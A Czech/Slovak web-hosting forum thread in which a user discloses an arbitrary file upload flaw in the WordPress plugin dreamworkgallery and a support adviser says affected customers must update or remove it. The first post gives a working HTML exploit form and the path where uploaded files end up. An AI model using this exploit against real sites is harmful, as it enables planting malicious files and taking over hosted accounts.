#1 2017-04-16 15:10:11

csafunsitecz
Endora uživatel
Registrován: 1970-01-01
Příspěvky: 2

wp-dreamworkgallery

Exploit v plugine dreamworkgallery vo Wordpress-e umožňuje útočníkový uploadnúť na stránku súbor bez vedommia majitela.

Na endore to funguje na nemenovanej stránke.| User: samsoncz | Admin : root@endora.cz

CODE:
-------------------------------------------------------------------------------------------------------------
<html>
<body>
<form action="http://názov_stránky/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
-------------------------------------------------------------------------------------------------------------

uploadnutý súbor sa nachádza: /wp-content/uploads/dreamwork/[číslo]_uploadfolder/big/[váš súbor]

FIX !!!

Upravil csafunsitecz (2017-04-16 16:20:15)

Offline

#2 2017-04-16 17:58:06

JF
Endora rádce
Místo: ....nice u Plzně
Registrován: 2010-06-22
Příspěvky: 11,876

Re: wp-dreamworkgallery

Toto zabezpečenie budú musieť riešiť jednotlivý užívatelia ktorý plugin používajú aby ho buď aktualizovali alebo odstránili. Inak im hrozí že sa útočník dostane ku všetkým ich doménam ktoré majú v účte.

Administrátori váš ticket evidujú a budú ho riešiť hneď ako to bude možné aby informovali jednotlivých užívateľov ktorých sa to týka.


Ján Fačkovec - Endora.cz by Webglobe
Email, Web, Webadmin, Webmail, Nápověda, Ceník

Offline

#3 2017-04-16 20:41:34

csafunsitecz
Endora uživatel
Registrován: 1970-01-01
Příspěvky: 2

Re: wp-dreamworkgallery

Ďakujem za odpoveď.

Offline

Zápatí

Založeno na FluxBB | CZ a SK